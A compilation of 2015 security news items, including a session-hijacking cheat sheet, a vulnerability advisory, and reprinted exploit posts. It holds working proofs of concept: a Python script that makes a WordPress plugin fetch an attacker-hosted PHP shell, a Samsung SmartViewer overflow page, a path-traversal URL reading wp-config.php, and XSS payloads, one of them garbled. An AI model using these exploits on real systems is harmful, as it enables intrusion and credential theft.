allow, the perimeter is not the secure defender it once was. It’s innately porous and can only block a certain percentage of those attempting to gain access to a network. Once the attacker is inside, they are on a hunt for anything of value, and often target privileged account credentials to gain access to those jewels quickly and effectively. It’s in Sony’s best interest moving forward to invest in safely storing, securing, and managing privileged account credentials such as system administrator, database administrator, ROOT, and service account passwords to prevent something like this from happening again. This cyberattack is a wake-up call to all enterprises who have been neglecting the regular maintenance of passwords belonging to these kinds of service accounts – especially companies that have recently had any kind of downsizing, shifting of roles in IT, or new offices in other locations. Left unchecked, these accounts are extremely vulnerable. Hackers are counting on it. What’s Next for Sony Pictures? Given the current evidence of poor security practice and subsequent brand and financial damage at Sony Pictures, it is unlikely they used any form of third party, or even first party auditing on stale security policies. I expect this to change for them going forward. If they are smart, they will get a third party vendor to properly audit and assess their security policies regularly. The truth is, the damage has been done. Emails have been leaked, data has been compromised. That cannot be remedied. Sony, like every other company that’s experienced a data breach, must learn from their mistakes and move forward. Sony Pictures will most likely look to a consulting firm to help them mend the damage and put a privileged account management (PAM) solution in place. PAM needs to play a central role in the rebuilding of their IT security infrastructure. Limiting account access, rotating privileged passwords on a scheduled basis and auditing account usage are key strategic pieces that not only will mitigate current levels of risk, but help set an example to other businesses industry-wide. The Sony hack’s biggest takeaway is that nobody should wait for a breach to occur to begin securing their privileged accounts. Source

‘Session Hijacking’ is an old and routine topic in the field of application security. To make it more interesting, in this article, we are going to focus on different ways it can be performed. Introduction for beginners Web applications communicate using HTTP protocol. HTTP is stateless, which means there is no support at the protocol level to identify the state of a particular request. In other words, web servers don’t have any mechanism to know whether the request is coming from a new client from a client which is already communicating with it. So from the server perspective, every request it receives is a new request. For instance, let us say a client logged into his Facebook account by sending his credentials. Now if he wishes to see his messages, he has to send his credential information again, because the server doesn’t normally know that he was already authenticated in the previous request. This is something that developers have to do themselves. This is called ‘Session Tracking’. How can sessions be tracked? Sessions are tracked by developers primarily through the use of session identifiers (SIDs). Once the user is successfully authenticated, a session ID is created by the server and maintained by the server. From there on, for every request this value is checked to track the user. In other words, session IDs are used as an authentication token so that user does not have to re-enter the credential information with every request. Based on how this SID this sent and received, there are 3 mechanisms to track sessions. Cookies: The SID is created and maintained in the server and sent to the user through cookies. A cookie is stored in the user’s hard disk and goes with each request. The server verifies the same before executing the request. This is the most widely used mechanism and we are going to talk more about this in the below sections. URL Rewriting: In this the SID value actually goes in the URL of each request. This kind of session tracking is difficult, as we need to keep track of the parameter as a chain link until the conversation completes. Hidden Fields: Hidden fields are elements which are not directly visible to the user. They can be viewed by looking at the page source. Interestingly, they can also be used for session management, as SID values can be stored in hidden fields and can be sent to the server with each request. This sort of mechanism is rarely used these days. Among these methods, cookies are most widely used method for session management. For remaining part of this article we will assume that we are talking about cookies when we talk about ‘session’. What is Session Hijacking? Session hijacking, as the name suggests, is all about knowing the session ID (SID) of an active user so that his account can be impersonated or hijacked. After a user enters his credentials, the application tries to identify him only based on his cookie value (which contains the SID). Hence, if this SID value of any active user is known to us, we can use the same and login to the application as a victim and thus get access to all of the information. And if session ID is gone, everything is gone! Session Hijacking Cheat Sheet Let us now take a look at different ways or scenarios in which active sessions can be hijacked. Session sidejacking If the application does not use SSL and transports the data in plain text, then anyone within the same network can grab the cookie values just by sniffing the traffic using tools such as Wireshark. There are a few cases worth mentioning here: SSL only for login page: Of course if there is no SSL then the credentials too would be gone (forget about cookies!), but there are some developers who use SSL for the login page alone, assuming that the credentials are transported safely. But once the user is authenticated, it is the cookies (that go with each request) that identify him. All the requests that are done after logging in contain cookies, and if they are not protected with SSL, the session can be easily hijacked. Thus the password may not be stolen, but the session can be hijacked. Single URL is enough to hijack a user: There are several cases where the application uses HTTP to fetch image or JS files that belong to same domain. The problem is when you send a request to a domain in which you are already signed in, the cookies would automatically go. That is how the cookies work. So in simple words, even if there is a single link which goes to the server without HTTPS, the cookies would go along with it and can be grabbed by an attacker who is sniffing the network. Session fixation Session fixation is an attack where the attacker fixes the session in advance and just waits for the user to login in order to hijack it. This is very much applicable to the SIDs in the URL scenario. If the application associates a user with an incoming SID without checking if it is generated by the server, then this attack is possible. An attacker logs into the site www.vulnerablesite.com. The server sets a cookie value and returns it to him, say Set-Cookie: SID=adfajkdfjer23411sdfadf The attacker now sends a link to the victim, http://www.vulnerablesite.com/test.php?SID= adfajkdfjer23411sdfadf The victim logs on and the server now assigns the SID value to him. (Why? Due to bad coding, the server does not check if it is generated by itself and tags it with the users). The attacker, who already knows the SID value he used, can now just use the same and access the victim’s account. Generating cookies before authentication Cookies are supposed to be generated (or at least changed) after successful authentication. If the same cookie which is generated before authentication is used after authentication, then session hijacking is possible, as explained here with a simple example. This is mostly exploitable in a public café or shared computers scenario. An attacker visits the site www.vulnerablesite.com. The server sets a cookie value and returns it to him, say Set-Cookie: SID=randomqrrqwer234234234 The attacker notes down this value and leaves the system, keeping the page open. The victim now logs into the same site. Cookie value does not change after authentication. The attacker, who already has the cookie value, can access the victim’s account. Predictable session IDs By analyzing the pattern of session IDs, an attacker can predict the session ID of a logged in user and thus hijack his account. For example, consider the below session cookie set by an application. Set-Cookie: sessionid=dG9tOm1hbmFnZXI= Although this seems to be random at first look, it is not actually! Base 64 decoding of the above value gives the below data. Base64 Decode [dG9tOm1hbmFnZXI=] = tom:manager Thus an attacker can study this pattern and construct a valid cookie, for instance something like Base64 Decode [admin:admin]. Similarly, if the session IDs are not random enough, an attacker can try to brute force them to gain access to the application. Using Cross Site Scripting vulnerability This article assumes that the reader is aware of what an XSS attack is about. So we are going to take a look at how XSS can be used to steal SID or cookie value. In simple words, XSS allows an attacker to execute scripts (such as JavaScript) on an end user’s browser. Hence an attacker just needs to write a script that can access the cookie value and send it to a server he owns. The below script does the same thing. It hits the attacker’s site with the cookie value. Accessing the cookie on the client side is possible through use of document.cookie. http://www.vulnerablesite.com/xssvulnerablepage.jsp?name=<script>document.location= “Thank You + document.cookie</script> Session puzzle attacks This vulnerability occurs when an application uses the same session variable for more than one purpose. Here an attacker tries to access the pages in a particular order so that the session variable is set in one context and then used in another. This is best explained in the below scenario. An attacker visits the application and clicks on the ‘Forgot Password’ link. Now he enters some other user’s ID (say admin) and clicks submit. After this the attacker just requests some internal page such as viewprofile.jsp and he logs in as admin. This worked because the application wrongly sets the session attribute when the forgot password process is initiated. The attacker takes advantage of this and exploits it by requesting it in a sequence. These types of vulnerabilities are more difficult to identify through normal testing, and hence source code reviews are the best way to look out for such vulnerabilities. Improper logout implementation When a user clicks on the logout button, the application is supposed to destroy all the session variables that are handled on the server side. But instead, some developers just delete the cookies from the client side using client side code. This seems to work fine when you browse normally, because once the cookies are removed from the machine it will redirect to login page, but the session on the server is active indefinitely. This means that an attacker who can grab this value can still access the application. This scenario increases the time period an attacker can launch attacks over valid sessions. Lack of session expiration mechanism All applications should track idle sessions and automatically redirect the user to a login page upon session timeout. Failure to do so would not only increase the time period an attacker can launch attacks, but also grant access to the application if he has physical access to that machine. Once again, this session expiration must be done at the server level and not just at the client level. Source

Chinese hackers have launched a wave of man-in-the-middle (MITM) attacks capable of stealing emails, contacts and passwords is targeting Microsoft Outlook users in the country. Greatfire.org, a group that reports on and works to combat Chinese government online censorship and surveillance, reported uncovering the campaign this week. "On January 17, we received reports that Microsoft's email system, Outlook (which was merged with Hotmail in 2013), was subjected to a MITM attack in China," read the Greatfire threat advisory. "This form of attack is especially devious because the warning messages users receive from their email clients are much less noticeable than the warning messages delivered to modern browsers." The attack reportedly uses a bogus certificate to push a malicious alert to Outlook users that siphons information from the victim's account if it is opened. "Users will only see an abrupt pop-up warning when the client tries to automatically retrieve messages. Users will then be able to tap on a 'continue' button and ignore the warning message," explained the advisory. "If users do click on the 'continue' button, all of their emails, contacts and passwords will be logged by the attackers." The number of affected Outlook users remains unknown, although a Microsoft spokesperson confirmed to V3 that the firm is aware of the attacks. "We are aware of a small number of customers impacted by malicious routing to a server impersonating Outlook.com. If a customer sees a certificate warning, they should contact their service provider for assistance," they said. Greatfire believes that the Chinese government is responsible for the attacks, citing similarities to previous attacks it believed were state sponsored. "Because of the similarity between this attack and previous, recent MITM attacks in China on Google, Yahoo and Apple, we once again suspect that Lu Wei and the Cyberspace Administration of China have orchestrated this attack," it said. "If our accusation is correct, this new attack signals that the Chinese authorities are intent on further cracking down on communication methods that they cannot readily monitor." The attack on Apple's iCloud occurred at the end of 2014 and was serious enough for CEO Tim Cook to fly to China. F-Secure security advisor Sean Sullivan told V3 that the Outlook attacks follow a similar pattern to the iCloud campaign and warned business users visiting China to be extra cautious. "This case appears similar to the move against iCloud back in October. Any business person travelling or working in China should use a VPN (or other measures) to access their email - or else pay very careful attention to warning messages," he said. "If you're doing business in China, be very mindful of the situation. I'd even recommend using separate hardware for the trip." Jason Steere, director of technology strategy at FireEye, mirrored Sullivan's sentiment, pointing out that, even if focused on monitoring Chinese citizens alone, the attacks could cause trouble for Western professionals visiting the country. "I suspect this attack is more about gathering intel on Chinese citizens - using international mail systems to communicate information that they could not do with a Chinese web platform due to censorship," he told V3. "However, many other people are collateral damage with information exposed that I'm sure they would prefer not to be picked up. "Anything sent or received, such as usernames, passwords, holidays, journalist sources, new stories, personal information etc, would all have been exposed during the time of the attack. "All of that information can be collected and used for intel, surveillance etc." The attack on Outlook comes less than a month after Chinese authorities began blocking local access to Google services including Gmail. Prior to the Google blockade the Beijing government mounted a mass censorship campaign that cut off access to thousands of websites, applications and cloud services in November 2014. Source

Oracle has released a critical patch update fixing 167 vulnerabilities across hundreds of its products, warning that the worst of them could be remotely exploited by hackers. The pressing fixes involve several of Oracle's most widely used products and scored a full 10.0 rating on the CVSS 2.0 Base Score for vulnerabilities, the highest score available. "The highest CVSS 2.0 Base Score for vulnerabilities in this critical patch update is 10.0 for Fujitsu M10-1 of Oracle Sun Systems Products Suite, Java SE of Oracle Java SE, M10-4 of Oracle Sun Systems Products Suite and M10-4S Servers of Oracle Sun Systems Products Suite," read the advisory. "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply critical patch update fixes as soon as possible." Oracle warned that the updates for Fujitsu M10-1 of Oracle Sun Systems Products Suite are particularly important. "This critical patch update contains 29 new security fixes for the Oracle Sun Systems Products Suite," the advisory said. "Ten of these vulnerabilities may be remotely exploitable without authentication [and] may be exploited over a network without the need for a username and password." The Oracle Java SE update fixes 19 flaws, 14 of which were also remotely exploitable. The next most serious flaws relate to Oracle's Fusion Middleware, which received 35 security fixes. The worst carries a 9.3 rating and could also be remotely exploited. The update follows reports that hackers are targeting enterprise companies with malware-laden patches purporting to come from Oracle. The news comes during a period of heated debate about patching best practice. Microsoft announced plans on 9 January to stop offering non-paying customers advanced patch notifications. The announcement led to a backlash in the security community, many feeling that the move is a money-grabbing tactic by Microsoft. Prior to the move, Microsoft came to blows with Google over the search firm's public disclosure of a Windows bug. Google Project Zero researchers publicly disclosed the bug in December 2014 having privately reported it to Microsoft in September. The move led to a debate about what constitutes responsible threat disclosure. Source

Tor-ramdisk is a uClibc-based micro Linux distribution whose sole purpose is to securely host a Tor server purely in RAM. For those not familiar with Tor, it is a system which allows the user to construct encrypted virtual tunnels which are randomly relayed between Tor servers (nodes) until the connection finally exits to its destination on the internet. The encryption and random relaying resist traffic analysis in that a malicious sniffer cannot easily discover where the traffic is coming from or what data it contains. While not perfect in its efforts to provide users with anonymity, Tor does help protect against unscrupulous companies, individuals or agencies from "watching us". For more information, see the Tor official site. The usefulness of a RAM only environment for Tor became apparent to me when Janssen was arrested by the German police towards the end of July, 2007. (You can read the full story in a CNET article.) While the police did not seize the computer for whatever reasons, they certainly could have. More typically, it would have been taken for forensic analysis of the data on the drives. Of course, if the computer housing the Tor server has no drives, there can be no question that it is purely a network relaying device and that one should look elsewhere for the "goods". Other advantages became clear: It is useful to operators that want all traces of the server to disappear on powerdown. This includes the private SSL keys which can be housed externally. The environment can be hardened in a manner specific to the limited needs of Tor. It has the usual speed advantages of diskless systems and can run on older hardware. The only known disadvantage is that it cannot host Tor hidden services which would require other services (e.g. http), and their resources (e.g. hard drive space), in addition to the Tor server itself. However, as a middle or exit node, it is ideal. Download Read more: Tor-ramdisk | opensource.dyc.edu

Mogwai Security Advisory MSA-2015-01 ---------------------------------------------------------------------- Title: WP Pixarbay Images Multiple Vulnerabilities Product: Pixarbay Images (Wordpress Plugin) Affected versions: 2.3 Impact: high Remote: yes Product link: https://wordpress.org/plugins/pixabay-images/ Reported: 14/01/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- Pixabay Images is a WordPress plugin that let's you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required. Business recommendation: ---------------------------------------------------------------------- Update to version 2.4 Vulnerability description: ---------------------------------------------------------------------- 1) Authentication bypass The plugin does not correctly check if the user is logged in. Certain code can be called without authentication 2) Arbitrary file upload The plugin code does not validate the host in the provided download URL, which allows to upload malicious files, including PHP code. 3) Path Traversal Certain values are not sanitized before they are used in a file operation. This allows to store files outside of the "download" folder. 4) Cross Site Scripting (XSS) The generated author link uses unsanitized user values which can be abused for Cross Site Scripting (XSS) attacks. Proof of concept: ---------------------------------------------------------------------- The following PoC Python script can be used to download PHP files from a attacker controlled host. #!/usr/bin/env python import argparse import httplib, urllib from urlparse import urlparse def exploit(target_url, shellcode_url): target = urlparse(target_url) params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url, 'image_user': 'none', 'q':'xxx/../../../../../../mogwai'}) headers = headers = {"Content-type": "application/x-www-form-urlencoded"} print "[+] Sending download request...." conn = httplib.HTTPConnection(target.netloc) conn.request("POST", target.path + "/wp-admin/", params, headers) response = conn.getresponse() response_data = response.read() if response.status != 200 and response_data != "Error: File attachment metadata error": print "[-] Something went wrong" print response_data exit() conn.close() # ---- Main code ---------------- parser = argparse.ArgumentParser() parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/") parser.add_argument("shellcode_url", help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php") print "----------------------------------------------" print " pixabay upload wordpress plugin exploit PoC" print " Mogwai security" print "----------------------------------------------" arguments = parser.parse_args() exploit(arguments.target_url, arguments.shellcode_url) Vulnerable / tested versions: ---------------------------------------------------------------------- Pixabay Images 2.3 Disclosure timeline: ---------------------------------------------------------------------- 14/01/2014: Reporting issues to the plugin author 15/01/2014: Release of fixed version (2.4) 19/01/2014: Public advisory Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de Source

A critical vulnerability discovered in Verizon's FiOS mobile application allowed an attacker to access the email account of any Verizon customer with relative ease, leaving almost five million user accounts of Verizon's FiOS application at risk. The FiOS API flaw was discovered by XDA senior software developer Randy Westergren on January 14, 2015, when he found that it was possible to not only read the contents of other users' inboxes, but also send message on their behalf. The issue was discovered while analyzing traffic generated by the Android version of My FiOS, which is used for account management, email and scheduling video recordings. Westergren took time to put together a proof-of-concept showing serious cause for concern, and then reported it to Verizon. The telecom giant acknowledged the researcher of the notification the same day and issued a fix on Friday, just two days after the vulnerability was disclosed. That's precisely how it should be done - quickly and efficiently. Microsoft could learn a lot more from Verizon, as Microsoft wasn't able to fix the security flaws in its software reported by Google’s Project Zero team even after a three-month-long time period provided to the company. One-after-one three serious zero-day vulnerabilities in Windows 7 and 8.1 were disclosed by Google’s security team before Microsoft planned to patch them. The FiOS API flaw, actually contained in the application’s API, allowed any account to be accessed by manipulating user identification numbers in web requests, giving attackers ability to read individual messages from a person’s Verizon inbox. According to the security researcher, the vulnerability even allowed attackers to send email messages from victims’ accounts and found and exploited further vulnerable API calls. "It was my suspicion that all of the API methods for this widget within the app were vulnerable. My last test was sending an outgoing message as another user [which was] also successful," Westergren wrote. The problem has been fixed by the telecom giant, so there is no need for users to worry about it. Verizon rewarded Westergren with a year's worth of free internet. "Version's (corporate) security group seemed to immediately realize the impact of this vulnerability and took it very seriously," Westergren said. Source

Several reports from the popular news websites had suggested that WhatsApp, the widely popular messaging application, is working on a new version of its instant messaging client, called WhatsApp PLUS, in order to provide its users a lot of handy new features. However the news seems to be completely fake!! WhatsApp Plus has already been launched a long ago and is not at all genuine as it is not associated with the Facebook-owned WhatsApp. Many users claimed to have already used WhatsApp Plus before. The latest news reports insist that WhatsApp Plus will bring 700 new themes and more number of emoticons, as well as will provide users with an option to change the font, and color among other things in an attempt to make the app look and feel more personalized. Moreover, the app will provide better privacy compared to the existing one. But, here you need to have a second thought. If we talk about better privacy, the only genuine report about WhatsApp came late last year, when WhatsApp partnered with Open Whisper Systems, a collaborative open source project to offer end-to-end encryption in its Android client. But, that was also with the same label, WhatsApp. The domain of WhatsApp Plus wasn't registered by WhatsApp, Inc, according to the Whois information of the alleged Whatsapp website. In order to find links to shady websites, BGR reports that they decompiled the WhatsApp Plus APK file circulating around the web, which revealed that the "app is communicating with illegitimate sources." Beware those who find the app genuine and interesting to download. There are many fake and malicious messaging apps that trick users to download and install, what could potentially be a malware. WhatsApp Plus is also not a genuine, but an effort by unauthorised websites to trick people into downloading it. We will strongly advise people to not download WhatsApp Plus, or any app that claims to be a new rather different version of WhatsApp. It has been confirmed that WhatsApp hasn’t launched any such app. The app could be a malware that can trouble your phone and downloading an alternative, would be laying your privacy and security at risk. Source

Want to hack someone’s Facebook account? or Gmail account? or break into somebody’s network? But don’t have hacking skills to do so. There’s no need to worry at all. A new service is out there for you guys where you can search for professional hackers and hire them to accomplish any hacking task. Dubbed Hacker's List, a new service that offers to connect customers and "professional" hackers for hire. The service would made any tech-illiterate person capable to break into his boss' email address. This really sounds like something that happens mostly in movies. As if I’m hiring a hacker to accomplish crimes for me. Hacker’s List, the three-month old website — launched in November — has received over 500 hacking jobs so far and waiting for successful bidders. There are around 70 anonymous hacker profiles displayed on the website, but many of them are inactive at the moment. The website charges a fee on a project and payment is cleared on completion of the work, just like freelancing sites. Based on hours, prices of hackers range between $28 to $300 and full hacking projects range in prices of $100 to $5000. As you might expect, it's all done anonymously — collection of fees when tasks are completed, nobody knows the identity of those involved in doing the work. Several projects ranging from 'Hacking into Facebook account', 'Hacking into Gmail accounts', 'Hacking into websites' and 'Hacking into business accounts' are listed on the website. Surprisingly, many jobs listed on the website are for the customers pleading for hackers to break into school systems in order to change grades. You can have a look below to see the list of some jobs, together with the price customers are willing to pay: $300-$500: I need a hack for an Android Game called "Iron Force" developed by "Chillingo". It's a dynamic Server game, frequently updated. very hard to hack. I need a hack that give diamonds and cash on this game and if possible a auto-play robot system for my account. $10-$350: Need some info and messages from a Facebook account. Other jobs to come if successful. $300-$600: I need a hacker to change my final grade, it should be done in a week. $200-$300: Hack into a company email account. Copy all emails in that account. Give copies of the emails employer. Send spam emails confessing to lying and defamation of character to everyone in the email list. Hacker’s List, a website registered in New Zealand, has become the first website ever to provide "ethical hacking" services. While the activities listed on the site are clearly illegal in some cases, but the website asks users not to "use the service for any illegal purposes," as laid out in its 10-page long terms and conditions section. Source

<html> <!-- Samsung SmartViewer BackupToAvi Remote Code Execution PoC PoC developed by Praveen Darshanam For more details refer http://darshanams.blogspot.com http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html Original Vulnerability Discovered by rgod Vulnerable: Samsung SmartViewer 3.0 Tested on Windows 7 Ultimate N SP1 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265 --> <object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object> <script > var payload_length = 15000; var arg1=1; var arg2=1; var arg3=1; //blank strings var junk = ""; var buf1 = ""; var buf2 = ""; //offset to SE is 156, initial analysis using metasploit cyclic pattern for (i=0; i<156; i++) { buf1 += "A"; } var nseh = "DD"; var seh = "\x87\x10"; //from Vulnerable DLL junk = buf1 + nseh + seh; //remaining buffer for (j=0; j<(payload_length-junk.length); j++) { buf2 += "B"; } //final malicious buffer var fbuff = junk + buf2; target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff); </script> </html> Source

# Exploit Title: CIP4 Folder Download Widget LFI # Google Dork: index of :/cip4-folder-download-widget # Date: 13-01-2015 # Exploit Author: Ben khlifa Fahmi (XTnR3v0lt) # Vendor Homepage: http://community.cip4.org # Software Link: https://wordpress.org/plugins/cip4-folder-download-widget/ # Version: 1.10 # Tested on: Ubuntu 14.04 Dork : inurl:/wp-content/plugins/cip4-folder-download-widget/ Exploit : http://localhost/[wordpress]/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php Ben khlifa Fahmi - Founder & CEO of Tunisian Cyber Army Greetz to : Joseph - Michou - hackerXben - RaisoMos - Lola - All muslim hackers world wide Source

Exploit Title: WebGUI 7.10.29 stable version Cross site scripting vulnerability Software Link: http://www.webgui.org/download Author: SECUPENT Website:www.secupent.com Email: research{at}secupent{dot}com Date: 17-1-2015 Version: 7.10.29. Previous version maybe vulnerable also. Vulnerable area: http://localhost/style-underground/search XSS PoC: 1" onmouseover=prompt(907460) bad=" Screenshot: Link: http://secupent.com/exploit/images/webgui-xss.png Mirror: http://vulnerability.io/exploit/images/webgui-xss.png Reference: http://secupent.com/exploit/WebGUI-7.10.29-XSS.txt Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers. Source

Breach Notification refers to the notification that businesses, government agencies and other entities are required by law in most states to do when certain personally identifiable information is obtained or believed to have been obtained by an unauthorized party. The breach can occur when a system is hacked or when a device containing sensitive information is lost, stolen or inadvertently sold. Personally identifiable information, also known as PII, is information that on its own or in conjunction with other information can be used to identify a person—the latter can include, for example, a name combined with a Social Security number, driver’s license number, bank account or credit card number. The first state breach notification law was passed in California in 2002 and went into effect the following year. Among the first breaches reported under the new law occurred in 2004 when a bank card processing company CardSystems Solutions was hacked. CardSystems Solutions processed purchasing transactions for its retailer customers by sending the card account data to the correct bank or issuer for authorization. Some 263,000 card numbers were verified stolen in the hack, but nearly 40 million card numbers were exposed to the hackers. The data involved card transactions that CardSystems had retained on its system long after the transactions were completed and that had been stored in an unencrypted format. The breach began in September 2004 but wasn’t discovered until May 2005. It was the first major breach disclosed under the new California law. Also among the first companies disclosing a breach under the new law was Choicepoint. The data broker sent letters to 145,000 people in February 2005 notifying them that it had mistakenly sold personal data about them to identity thieves. ChoicePoint was in the business of collection financial, medical and other information on billions of people in order to sell it to other marketers, other businesses and government agencies. The thieves had posed as legitimate businesses to open customer accounts with the massive data broker, then subsequently succeeded to purchase Social Security numbers, credit histories and other information that ChoicePoint had collected on them. Since the California law was passed, another forty-six states and the District of Columbia have passed similar legislation. Alabama, New Mexico and South Dakota do not have breach laws. This patchwork of laws has resulted in uneven and confusing requirements for businesses with customers in multiple states. The laws vary on a number of things, including when notification needs to occur, how notification should occur and exemptions from notification. Federal lawmakers have been trying for years to remedy this confusing patchwork of laws by passing a federal law that would take precedent over all of them. But the proposed bills have failed to take hold on Capitol Hill. President Obama and the White House began pushing another bill in January 2015 that would require breached entities to notify affected victims within 30 days of discovering the breach, though critics say this renewed push for a mandatory notification period will likely suffer the same problems previous bills had. Source